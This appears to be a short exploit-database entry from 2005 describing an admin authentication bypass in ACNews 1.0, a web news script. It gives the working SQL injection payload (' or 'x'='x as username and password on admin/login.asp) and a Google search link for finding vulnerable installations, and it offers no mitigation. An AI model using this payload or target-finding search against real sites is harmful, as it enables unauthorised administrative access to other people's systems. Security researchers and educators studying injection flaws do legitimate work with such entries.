ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit
2005-04-09 00:00:00# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke
Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection
[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.
greetz to HaXoR & LOverboy
auther : LaMeR
securitygurus team
#
Fixes
No fixesIn order to submit a new fix you need to be registered.

